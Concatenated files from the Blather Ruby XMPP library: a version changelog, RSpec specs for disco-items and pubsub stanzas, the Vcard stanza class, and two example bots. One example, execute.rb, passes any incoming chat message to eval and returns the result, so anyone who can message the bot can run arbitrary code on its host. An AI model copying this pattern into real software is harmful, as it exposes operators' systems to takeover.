* Feature: Implement Blather::Roster#version, which returns version of last processed roster stanza
# [v1.1.4](https://github.com/adhearsion/blather/compare/v1.1.4...v1.1.4) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.4)
* Bugfix: Typo in passing through connection options
* Today was a very dark day. I am ashamed of myself.
# [v1.1.3](https://github.com/adhearsion/blather/compare/v1.1.2...v1.1.3) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.3)
* Bugfix: Expose alternative authentication ID in DSL (correct default)
# [v1.1.2](https://github.com/adhearsion/blather/compare/v1.1.1...v1.1.2) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.2)
* Bugfix: Expose alternative authentication ID in DSL
# [v1.1.1](https://github.com/adhearsion/blather/compare/v1.1.0...v1.1.1) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.1)
* Bugfix: Expose alternative authentication ID when setting up a client
# [v1.1.0](https://github.com/adhearsion/blather/compare/v1.0.0...v1.1.0) - [2015-06-12](https://rubygems.org/gems/blather/versions/1.1.0)
* Feature: Permit an alternative authentication ID when connection. Used to support [MojoAuth](http://mojoauth.mojolingo.com/) and similar schemes.
* Bugfix: Allow sending errors to the wire directly with correct formatting (previously raised)
* Bugfix: Don't pass service unavailable response to be processed as roster in client_post_init
# [v1.0.0](https://github.com/adhearsion/blather/compare/v0.8.8...v1.0.0) - [2014-02-10](https://rubygems.org/gems/blather/versions/1.0.0)
* Stable API promise
* Bugfix: Fix the DSL module-extended API that was broken by 8327184acc57c20daeaebb975729ff70207eab67
# [v0.8.8](https://github.com/adhearsion/blather/compare/v0.8.7...v0.8.8) - [2013-09-30](https://rubygems.org/gems/blather/versions/0.8.8)
* Bugfix: Warn about local file transfers being disabled by default
* Bugfix: Ensure that file transfers are accepted instantly. See https://groups.google.com/forum/#!topic/xmpp-blather/LMl6pR9qHfA
# [v0.8.7](https://github.com/adhearsion/blather/compare/v0.8.6...v0.8.7) - [2013-08-26](https://rubygems.org/gems/blather/versions/0.8.7)
* Bugfix: Handle stanzas with nested elements that don't have a decorator module or are not stanzas
* Bugfix: Fix the roster which was broken by the DSL being included in Object
# [v0.8.6](https://github.com/adhearsion/blather/compare/v0.8.5...v0.8.6) - [2013-08-23](https://rubygems.org/gems/blather/versions/0.8.6)
* Bugfix: Ensure that session creation always comes immediately after binding. Fixes incompatibility with ejabberd.
* Bugfix: Close streams on next EM tick to avoid hanging.
* Bugfix: Ensure handler methods are available even when including the DSL in Object
# [v0.8.5](https://github.com/adhearsion/blather/compare/v0.8.4...v0.8.5) - [2013-06-01](https://rubygems.org/gems/blather/versions/0.8.5)
* Bugfix: Ensure that binding is always performed before session creation, regardless of the order of elements in the feature set provided by the server. This was causing incompatability with Tigase.
# [v0.8.4](https://github.com/adhearsion/blather/compare/v0.8.3...v0.8.4) - [2013-03-20](https://rubygems.org/gems/blather/versions/0.8.4)
* Bugfix: Only finish stream parser if there is one. This prevents crashes on failure to connect.
# [v0.8.3](https://github.com/adhearsion/blather/compare/v0.8.2...v0.8.3) - [2013-03-03](https://rubygems.org/gems/blather/versions/0.8.3)
* Bugfix: Strange issue causing total failure with 0.8.2 - https://github.com/adhearsion/blather/issues/108
# [v0.8.2](https://github.com/adhearsion/blather/compare/v0.8.1...v0.8.2) - [2013-01-02](https://rubygems.org/gems/blather/versions/0.8.2)
* Bugfix: General spec fixes
* Bugfix: Fixes for JRuby and Rubinius
* Bugfix: Ensure parsers are shut down correctly
* Update: Bump Nokogiri (1.5.6) and EventMachine (1.0.0) minimum versions
# [v0.8.1](https://github.com/adhearsion/blather/compare/v0.8.0...v0.8.1) - [2012-09-17](https://rubygems.org/gems/blather/versions/0.8.1)
* Project moved to the Adhearsion Foundation
* Fixes for EventMachine 1.0.x
* Simplify booting client using the DSL in the varying supported modes
* Documentation fixes
# [v0.8.0](https://github.com/adhearsion/blather/compare/v0.7.1...v0.8.0) - [2012-07-09](https://rubygems.org/gems/blather/versions/0.8.0)
* Feature(jmkeys): DSL methods for joining and sending messages to MUC rooms
* Feature(jackhong): Inband registration support
* Bugfix(benlangfeld): Ensure that presence nodes which are both status and subscription may be responded to
* Bugfix(benlangfeld): A whole bunch of JRuby fixes
# [v0.7.1](https://github.com/adhearsion/blather/compare/v0.7.0...v0.7.1) - [2012-04-29](https://rubygems.org/gems/blather/versions/0.7.1)
* Documentation updates
* Bugfix(benlangfeld): Relax Nokogiri dependency to allow 1.5
* Bugfix(benlangfeld): Fix some nokogiri 1.5 related bugs on JRuby (some remain)
* Bugfix(benlangfeld): Set namespaces correctly on some tricky nodes
* Bugfix(benlangfeld): Ensure all presence sub-types trigger the correct handlers
# [v0.7.0](https://github.com/adhearsion/blather/compare/v0.6.2...v0.7.0) - [2012-03-15](https://rubygems.org/gems/blather/versions/0.7.0)
* Change(benlangfeld): Drop Ruby 1.8.7 compatability
* Change(bklang): Remove the wire log, which duplicated the parsed logging
* Feature(benlangfeld): Stanza handlers are now executed outside of the EM reactor, so it is not blocked on stanza processing
* Bugfix(benlangfeld): MUC user presence and messages now have separate handler names
* Feature(benlangfeld): Stanzas may now be imported from a string using `XMPPNode.parse`
* Bugfix(benlangfeld): All `Blather::Stanza::Presence::C` attributes are now accessible on importing
* Bugfix(benlangfeld): Presence stanzas are now composed on import, including all children
* Bugfix(mtrudel): JIDs in roster item stanzas are now stripped of resources
# [v0.6.2](https://github.com/adhearsion/blather/compare/v0.6.1...v0.6.2) - [2012-02-28](https://rubygems.org/gems/blather/versions/0.6.2)
* Feature(benlangfeld): Add password support to `MUCUser`
* Feature(benlangfeld): Add support for invitation elements to `MUCUser` messages
* Feature(benlangfeld): Add support for MUC invite declines
* Bugfix(benlangfeld): Don't implicitly create an invite node when checking invite status
* Bugfix(benlangfeld): Ensure that form nodes are not duplicated on muc/muc_user presence stanzas
# [v0.6.1](https://github.com/adhearsion/blather/compare/v0.6.0...v0.6.1) - [2012-02-25](https://rubygems.org/gems/blather/versions/0.6.1)
* Bugfix(benlangfeld): Ensure MUC presence nodes (joining) have a form element on creation
# [v0.6.0](https://github.com/adhearsion/blather/compare/v0.5.12...v0.6.0) - [2012-02-24](https://rubygems.org/gems/blather/versions/0.6.0)
* Feature(benlangfeld): Very basic MUC and delayed message support
* Bugfix(theozaurus): Disable connection timeout timer if client deliberately disconnects
* Bugfix(mtrudel): Fix `Roster#each` to return roster_items as per documentation
# [v0.5.12](https://github.com/adhearsion/blather/compare/v0.5.11...v0.5.12) - [2012-01-06](https://rubygems.org/gems/blather/versions/0.5.12)
* Bugfix(benlangfeld): Allow specifying the connection timeout in DSL setup
# [v0.5.11](https://github.com/adhearsion/blather/compare/v0.5.10...v0.5.11) - [2012-01-06](https://rubygems.org/gems/blather/versions/0.5.11)
* Feature(benlangfeld): Allow specifying a connection timeout
* Raise `Blather::Stream::ConnectionTimeout` if timeout is exceeded
* Default to 180 seconds
# [v0.5.10](https://github.com/adhearsion/blather/compare/v0.5.9...v0.5.10) - [2011-12-02](https://rubygems.org/gems/blather/versions/0.5.10)
* Feature(juandebravo): Allow configuring the wire log level
* Bugfix(benlangfeld): Checking connection status before the stream is established
# [v0.5.9](https://github.com/adhearsion/blather/compare/v0.5.8...v0.5.9) - [2011-11-24](https://rubygems.org/gems/blather/versions/0.5.9)
* Bugfix(benlangfeld): Failed connections now raise a Blather::Stream::ConnectionFailed exception
* Bugfix(crohr): Blather now supports EventMachine 1.0
# v0.5.8
* Bugfix(benlangfeld): JIDs now maintain case, but still compare case insensitively
* Bugfix(jmazzi): Development dependencies now resolve correctly on JRuby and Rubinius
# v0.5.7
* Bugfix(benlangfeld): Don't install BlueCloth as a development dependency when on JRuby
# v0.5.6
* Changes from 0.5.5, this time without a bug when using the namespaced DSL approach
# v0.5.5 (yanked)
* Bugfix(benlangfeld/kibs): ActiveSupport was overriding the presence DSL method
* Feature(fyafighter): Adds SSL peer verification to TLS
# v0.5.4
* Bugfix(fyafighter): Regression related to earlier refactoring: https://github.com/sprsquish/blather/issues/53
* Feature(fyafighter): Make it much easier to allow private network addresses
* Bugfix(benlangfeld): Fix the Nokogiri dependency to the 1.4.x series, due to a bug in 1.5.x
* Bugfix(zlu): Replace class_inheritable_attribute with class_attribute because it is deprecated in ActiveSupport 3.1
# v0.5.3
* Feature(benlangfeld): Add XMPP Ping (XEP-0199) support
# v0.5.2
* Bugfix(benlangfeld): Remove specs for the Nokogiri extensions which were moved out
# v0.5.1 - yanked
* Feature(benlangfeld): Abstract out Nokogiri extensions and helpers into new Niceogiri gem for better sharing
* Documentation(benlangfeld)
# v0.5.0
* Feature(radsaq): Add a #connected? method on Blather::Client
* Feature(benlangfeld)[API change]: Allow the removal of child nodes from an IQ reply
* Bugfix(zlu): Use rubygems properly in examples
* Bugfix(benlangfeld): Remove code borrowed from ActiveSupport and instead depend on it to avoid version conflicts
* Documentation(sprsquish)
# v0.4.16
* Feature(benlangfeld): switch from jeweler to bundler
* Feature(benlangfeld): add cap support (XEP-0115)
* Bugfix(sprsquish): Better equality checking
* Bugfix(sprsquish): Fix #to_proc
* Bugfix(mironov): Skip private IPs by default
# v0.4.15
* Feature(mironov): Implement XEP-0054: vcard-temp
* Feature(benlangfeld): Basic support for PubSub subscription notifications as PubSub events
* Feature(mironov): Ability to clear handlers
* Feature(mironov): Implement incoming file transfers (XEP-0096, XEP-0065, XEP-0047)
* Bugfix(mironov): Fix for importing messages with chat states
* Bugfix(mironov): Added Symbol#to_proc method to work on ruby 1.8.6
* Bugfix(mironov): Fix roster items .status method to return highest priority presence
* Bugfix(mironov): Remove old unavailable presences while adding new one
* Bugfix(mironov): Use Nokogiri::XML::ParseOptions::NOENT to prevent double-encoding of entities
* Bugfix(benlangfeld): Disco Info Identities should have an xml:lang attribute
* Bugfix(mironov): Fix lookup path for ruby 1.9
* Bugfix(mironov): stanza_error.to_node must set type of the error
* Bugfix(mironov): Allow message to have iq child
* Bugfix(mironov): Find xhtml body in messages sent from iChat 5.0.3
# v0.4.14
* Tests: get specs fully passing on rubinius
* Feature(mironov): Implement XEP-0085 Chat State Notifications
* Bugfix(mironov): send stanzas unformatted
* Bugfix(mironov): Message#xhtml uses inner_html so tags aren't escaped
* Bugfix(mironov): Message#xhtml= now works with multiple root nodes
# v0.4.13
* Bugfix: Place form child of command inside command element
# v0.4.12
* API Change: Switch order of var and type arguments to X::Field.new since var is always required but type is not
* API Change: PubSub payloads can be strings or nodes and can be set nil. PubSub#payload will always return a string
* Feature: Add forms to Message stanzas
# v0.4.11
* Bugfix: command nodes where generating the wrong xml
* Bugfix: x nodes where generating the wrong xml
* Feature: ability to set identities and features on disco info nodes
* Feature: ability to set items on disco item nodes
# v0.4.10
* no change
# v0.4.9
* Feature: XEP-0004 x:data (benlangfeld)
* Feature: XEP-0050 Ad-Hoc commands (benlangfeld)
* Minor bugfixes for the specs
# v0.4.8
* Feature: add xhtml getter/setter to Message stanza
* Bugfix: heirarchy -> hierarchy spelling mistake
* Hella documentation
# v0.4.7
* Update to work with Nokogiri 1.4.0
# v0.4.6
* Bugfix: prioritize authentication mechanisms
# v0.4.5
* Bugfix: Change DSL#write to DSL#write_to_stream. Previous way was messing with YAML
# v0.4.4
* Add "disconnected" handler type to handle connection termination
* Bugfix: Fix error with pubsub using the wrong client connection
# v0.4.3
* Bugfix: status stanza with a blank state will be considered :available (GH-23)
* Bugfix: ensure regexp guards try to match against a string (GH-24)
* Stream creation is now evented. The stream object will be sent to #post_init
* Parser debugging disabled by default
* Update parser to work with Nokogiri 1.3.2
* Bugfix: discover helper now calls the correct method on client
* Bugfix: ensure XMPPNode#inherit properly sets namespaces on inherited nodes
* Bugfix: xpath guards with namespaces work properly (GH-25)
# v0.4.2
* Fix -D option to actually put Blather in debug mode
* Stanzas over a client connection will either have the full JID or no JID
* Regexp guards can be anything that implements #last_match (Regexp or Oniguruma)
* Add "halt" and "pass" to allow handlers to either halt the handler chain or pass to the next handler
* Fix default status handler so it doesn't eat the stanza
* Add before and after filters. Filters, like handlers, can have guards.
# v0.4.1
* Bugfix in roster: trying to call the wrong method on client
# v0.4.0
* Switch from LibXML-Ruby to Nokogiri
* Update test suite to run on Ruby 1.9
* Add "<<" style writer to the DSL to provide for chaining outbound writes
* SRV lookup support
* Add XPath type of handler guard
* PubSub support
# v0.3.4
* Remove unneeded functions from the push parser.
* Create a ParseWarning error that doesn't kill the stream.
* When a parse error comes in the reply should let the other side know it screwed up before dying.
* Add the LibXML::XML::Error node to the ParseError/ParseWarning objects.
# v0.3.3
* Fix the load error related to not pushing Blather's dir into the load path
# v0.3.2
* Switch the push parser from chunking to streaming.
* Don't push Blather's dir into the load paths
# v0.3.1
* Small changes to the DSL due to handler collisions:
"status" -> "set_status"
"roster" -> "my_roster"
* Small changes to the Blather::Client API to keep it feeling more like EM's API:
#stream_started -> #post_init
#call -> #receive_data
#stop -> #close
#stopped -> #unbind
* Refactored some of the code internal to Blather::Client
* Added command line option handler to default use method (see README)
* require libxml-ruby >=1.1.2 (1.1.3 has an inconsistent malloc err on OS X 10.5)
* complete specs
* add single process ping-pong example
# v0.3.0
* Remove autotest discover.rb (created all sorts of conflicts)
* Added Hash with Array guard
* Added a hirrarchy printer to examples directory
* Moved Disco to be in the Stanza namespace (staves off deeply namespaced classes)
* Namespaced the DSL methods to Blather::DSL. These can be included in any object you like now. "require 'blather/client'" will still include them directly in Kernel to keep the simple one-file dsl
* Stopped doing one class per error type. This created a giant hierarchy tree that was just unnecessary. The error name is now #name. Errors can be matched with a combination of handler and guard.
* Fixed XML namespaces. Previous versions weren't actually adding the node to the namespace making xpath queries inconsistent at best.
* Added support for anonymous authentication by providing a blank node on the jid ("@[host]")
# v0.2.3
* Go back to using the master branch for gems (stupid mistake)
# v0.2.2
* Switch to Jeweler.
* Move from custom libxml to just a custom push parser
* Add guards to handlers
# v0.2.1 Upgrade to libxml 0.9.7
# v0.2 Overhaul the DSL to look more like Sinatra
# v0.1 Initial release (birth!)
<file_sep>/spec/blather/stanza/discos/disco_items_spec.rb
require 'spec_helper'
def disco_items_xml
<<-XML
<iq type='result'
from='catalog.shakespeare.lit'
to='<EMAIL>/orchard'
id='items2'>
<query xmlns='http://jabber.org/protocol/disco#items'>
<item jid='catalog.shakespeare.lit'
node='books'
name='Books by and about Shakespeare'/>
<item jid='catalog.shakespeare.lit'
node='clothing'
name='Wear your literary taste with pride'/>
<item jid='catalog.shakespeare.lit'
node='music'
name='Music from the time of Shakespeare'/>
</query>
</iq>
XML
end
describe Blather::Stanza::Iq::DiscoItems do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:query, 'http://jabber.org/protocol/disco#items')).to eq(Blather::Stanza::Iq::DiscoItems)
end
it 'must be importable' do
expect(Blather::XMPPNode.parse(disco_items_xml)).to be_instance_of Blather::Stanza::Iq::DiscoItems
end
it 'is constructed properly' do
n = Blather::Stanza::Iq::DiscoItems.new :get, '/path/to/node'
n.to = '<EMAIL>'
expect(n.find("/iq[@to='<EMAIL>' and @type='get' and @id='#{n.id}']/ns:query[@node='/path/to/node']", :ns => Blather::Stanza::Iq::DiscoItems.registered_ns)).not_to be_empty
end
it 'has a node attribute' do
n = Blather::Stanza::Iq::DiscoItems.new nil, 'music', []
expect(n.node).to eq('music')
n.node = :foo
expect(n.node).to eq('foo')
end
it 'inherits a list of identities' do
n = parse_stanza disco_items_xml
r = Blather::Stanza::Iq::DiscoItems.new.inherit n.root
expect(r.items.size).to eq(3)
expect(r.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::DiscoItems::Item])
end
it 'takes a list of hashes for items' do
items = [
{:jid => 'foo@bar/baz', :node => 'node', :name => 'name'},
{:jid => 'baz@foo/bar', :node => 'node1', :name => 'name1'},
]
control = [ Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name]),
Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1])]
di = Blather::Stanza::Iq::DiscoItems.new nil, nil, items
expect(di.items.size).to eq(2)
di.items.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a list of Item objects as items' do
control = [ Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name]),
Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1])]
di = Blather::Stanza::Iq::DiscoItems.new nil, nil, control
expect(di.items.size).to eq(2)
di.items.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a single hash as identity' do
control = [Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name])]
di = Blather::Stanza::Iq::DiscoItems.new nil, nil, {:jid => 'foo@bar/baz', :node => 'node', :name => 'name'}
expect(di.items.size).to eq(1)
di.items.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a single identity object as identity' do
control = [Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name])]
di = Blather::Stanza::Iq::DiscoItems.new nil, nil, control.first
expect(di.items.size).to eq(1)
di.items.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a mix of hashes and identity objects as items' do
items = [
{:jid => 'foo@bar/baz', :node => 'node', :name => 'name'},
Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1]),
]
control = [ Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name]),
Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1])]
di = Blather::Stanza::Iq::DiscoItems.new nil, nil, items
expect(di.items.size).to eq(2)
di.items.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'allows adding of items' do
di = Blather::Stanza::Iq::DiscoItems.new
expect(di.items.size).to eq(0)
di.items = [{:jid => 'foo@bar/baz', :node => 'node', :name => 'name'}]
expect(di.items.size).to eq(1)
di.items += [Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name])]
expect(di.items.size).to eq(2)
di.items = nil
expect(di.items.size).to eq(0)
end
end
describe Blather::Stanza::Iq::DiscoItems::Item do
it 'will auto-inherit nodes' do
n = parse_stanza "<item jid='foo@bar/baz' node='music' name='Music from the time of Shakespeare' />"
i = Blather::Stanza::Iq::DiscoItems::Item.new n.root
expect(i.jid).to eq(Blather::JID.new('foo@bar/baz'))
expect(i.node).to eq('music')
expect(i.name).to eq('Music from the time of Shakespeare')
end
it 'has a jid attribute' do
n = Blather::Stanza::Iq::DiscoItems::Item.new 'foo@bar/baz'
expect(n.jid).to be_kind_of Blather::JID
expect(n.jid).to eq(Blather::JID.new('foo@bar/baz'))
n.jid = 'baz@foo/bar'
expect(n.jid).to eq(Blather::JID.new('baz@foo/bar'))
end
it 'has a node attribute' do
n = Blather::Stanza::Iq::DiscoItems::Item.new 'foo@bar/baz', 'music'
expect(n.node).to eq('music')
n.node = 'book'
expect(n.node).to eq('book')
end
it 'has a name attribute' do
n = Blather::Stanza::Iq::DiscoItems::Item.new 'foo@bar/baz', nil, 'Music from the time of Shakespeare'
expect(n.name).to eq('Music from the time of Shakespeare')
n.name = 'Books by and about Shakespeare'
expect(n.name).to eq('Books by and about Shakespeare')
end
it 'can determine equality' do
a = Blather::Stanza::Iq::DiscoItems::Item.new('foo@bar/baz')
expect(a).to eq(Blather::Stanza::Iq::DiscoItems::Item.new('foo@bar/baz'))
expect(a).not_to equal Blather::Stanza::Iq::DiscoItems::Item.new('not-foo@bar/baz')
end
end
<file_sep>/spec/blather/stanza/pubsub/subscription_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Subscription do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:subscription, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Subscription)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(subscription_xml)).to be_instance_of Blather::Stanza::PubSub::Subscription
end
it 'ensures an subscription node is present on create' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node', 'jid', 'subid', :none
expect(subscription.find('//ns:pubsub/ns:subscription', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an subscription node exists when calling #subscription_node' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node', 'jid', 'subid', :none
subscription.pubsub.remove_children :subscription
expect(subscription.find('//ns:pubsub/ns:subscription', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(subscription.subscription_node).not_to be_nil
expect(subscription.find('//ns:pubsub/ns:subscription', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node', 'jid', 'subid', :none
expect(subscription.type).to eq(:set)
end
it 'sets the host if requested' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'pubsub.jabber.local', 'node', 'jid', 'subid', :none
expect(subscription.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
expect(subscription.node).to eq('node-name')
end
it 'has a node attribute' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
expect(subscription.find('//ns:pubsub/ns:subscription[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.node).to eq('node-name')
subscription.node = 'new-node'
expect(subscription.find('//ns:pubsub/ns:subscription[@node="new-node"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.node).to eq('new-node')
end
it 'has a jid attribute' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
expect(subscription.find('//ns:pubsub/ns:subscription[@jid="jid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.jid).to eq(Blather::JID.new('jid'))
subscription.jid = Blather::JID.new('n@d/r')
expect(subscription.find('//ns:pubsub/ns:subscription[@jid="n@d/r"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.jid).to eq(Blather::JID.new('n@d/r'))
end
it 'has a subid attribute' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
expect(subscription.find('//ns:pubsub/ns:subscription[@subid="subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.subid).to eq('subid')
subscription.subid = 'new-subid'
expect(subscription.find('//ns:pubsub/ns:subscription[@subid="new-subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.subid).to eq('new-subid')
end
it 'has a subscription attribute' do
subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
expect(subscription.find('//ns:pubsub/ns:subscription[@subscription="none"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.subscription).to eq(:none)
subscription.subscription = :pending
expect(subscription.find('//ns:pubsub/ns:subscription[@subscription="pending"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscription.subscription).to eq(:pending)
end
it 'ensures subscription is one of Stanza::PubSub::Subscription::VALID_TYPES' do
expect { Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::PubSub::Subscription::VALID_TYPES.each do |valid_type|
n = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', valid_type
expect(n.subscription).to eq(valid_type)
end
end
Blather::Stanza::PubSub::Subscription::VALID_TYPES.each do |valid_type|
it "provides a helper (#{valid_type}?) for type #{valid_type}" do
expect(Blather::Stanza::PubSub::Subscription.new).to respond_to :"#{valid_type}?"
end
end
end
<file_sep>/examples/execute.rb
#!/usr/bin/env ruby
require 'rubygems'
require 'blather/client'
message :chat?, :body => 'exit' do |m|
say m.from, 'Exiting ...'
shutdown
end
message :chat?, :body do |m|
begin
say m.from, eval(m.body)
rescue => e
say m.from, e.inspect
end
end
<file_sep>/spec/blather/stanza/pubsub/subscribe_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Subscribe do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:subscribe, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Subscribe)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(subscribe_xml)).to be_instance_of Blather::Stanza::PubSub::Subscribe
end
it 'ensures an subscribe node is present on create' do
subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node', 'jid'
expect(subscribe.find('//ns:pubsub/ns:subscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures an subscribe node exists when calling #subscribe' do
subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node', 'jid'
subscribe.pubsub.remove_children :subscribe
expect(subscribe.find('//ns:pubsub/ns:subscribe', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(subscribe.subscribe).not_to be_nil
expect(subscribe.find('//ns:pubsub/ns:subscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node', 'jid'
expect(subscribe.type).to eq(:set)
end
it 'sets the host if requested' do
subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'pubsub.jabber.local', 'node', 'jid'
expect(subscribe.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node-name', 'jid'
expect(subscribe.node).to eq('node-name')
end
it 'has a node attribute' do
subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node-name', 'jid'
expect(subscribe.find('//ns:pubsub/ns:subscribe[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscribe.node).to eq('node-name')
subscribe.node = 'new-node'
expect(subscribe.find('//ns:pubsub/ns:subscribe[@node="new-node"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscribe.node).to eq('new-node')
end
it 'has a jid attribute' do
subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node-name', 'jid'
expect(subscribe.find('//ns:pubsub/ns:subscribe[@jid="jid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscribe.jid).to eq(Blather::JID.new('jid'))
subscribe.jid = Blather::JID.new('n@d/r')
expect(subscribe.find('//ns:pubsub/ns:subscribe[@jid="n@d/r"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
expect(subscribe.jid).to eq(Blather::JID.new('n@d/r'))
end
end
<file_sep>/examples/rosterprint.rb
#!/usr/bin/env ruby
# Prints out each roster entry
require 'rubygems'
require 'blather/client'
when_ready do
my_roster.grouped.each do |group, items|
puts "#{'*'*3} #{group || 'Ungrouped'} #{'*'*3}"
items.each { |item| puts "- #{item.name} (#{item.jid})" }
puts
end
shutdown
end
<file_sep>/lib/blather/stanza/iq/vcard.rb
module Blather
class Stanza
class Iq
# # Vcard Stanza
#
# [XEP-0054 vcard-temp](http://xmpp.org/extensions/xep-0054.html)
#
# This is a base class for any vcard based Iq stanzas. It provides a base set
# of methods for working with vcard stanzas
#
# @example Retrieving One's vCard
# iq = Blather::Stanza::Iq::Vcard.new :get
# client.write_with_handler iq do |response|
# puts response.vcard
# end
#
# @example Updating One's vCard
# iq = Blather::Stanza::Iq::Vcard.new :set
# iq.vcard['NICKNAME'] = 'Romeo'
# client.write_with_handler iq do |response|
# puts response
# end
#
# @example Viewing Another User's vCard
# iq = Blather::Stanza::Iq::Vcard.new :get, '<EMAIL>'
# client.write_with_handler iq do |response|
# puts response.vcard
# end
#
# @handler :vcard
class Vcard < Iq
register :vcard, :vCard, 'vcard-temp'
# Overrides the parent method to ensure a vcard node is created
#
# @see Blather::Stanza::Iq.new
def self.new(type = nil, to = nil, id = nil)
node = super
node.vcard
node
end
# Overrides the parent method to ensure the current vcard node is destroyed
#
# @see Blather::Stanza::Iq#inherit
def inherit(node)
vcard.remove
super
self
end
# Find or create vcard node
#
# @return [Vcard::Vcard]
def vcard
Vcard.find_or_create self
end
# Replaces vcard node
#
# @param [Vcard::Vcard, XML::Node] info the stanza's new vcard node
#
# @return [Vcard::Vcard]
def vcard=(info)
vcard.remove
self << info
Vcard.find_or_create self
end
# Vcard stanza fragment
class Vcard < XMPPNode
# @private
VCARD_NS = 'vcard-temp'
# Create a new Vcard::Vcard object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Vcard::Vcard]
def self.new(node = nil)
new_node = super :vCard
new_node.namespace = VCARD_NS
new_node.inherit node if node
new_node
end
# Find or create vCard node in Vcard Iq and converts it to Vcard::Vcard
#
# @param [Vcard] parent a Vcard Iq where to find or create vCard
#
# @return [Vcard::Vcard]
def self.find_or_create(parent)
if found_vcard = parent.find_first('//ns:vCard', :ns => VCARD_NS)
vcard = self.new found_vcard
found_vcard.remove
else
vcard = self.new
end
parent << vcard
vcard
end
# Find the element's value by name
#
# @param [String] name the name of the element
#
# @return [String, nil]
def [](name)
name = name.split("/").map{|child| "ns:#{child}"}.join("/")
if elem = find_first(name, :ns => VCARD_NS)
elem.content
else
nil
end
end
# Set the element's value
#
# @param [String] name the name of the element
# @param [String, nil] value the new value of element
#
# @return [String, nil]
def []=(name, value)
elem = nil
parent = self
name.split("/").each do |child|
elem = parent.find_first("ns:#{child}", :ns => VCARD_NS)
unless elem
elem = XMPPNode.new(child, parent.document)
parent << elem
parent = elem
else
parent = elem
end
end
elem.content = value
end
end
end
end
end
end
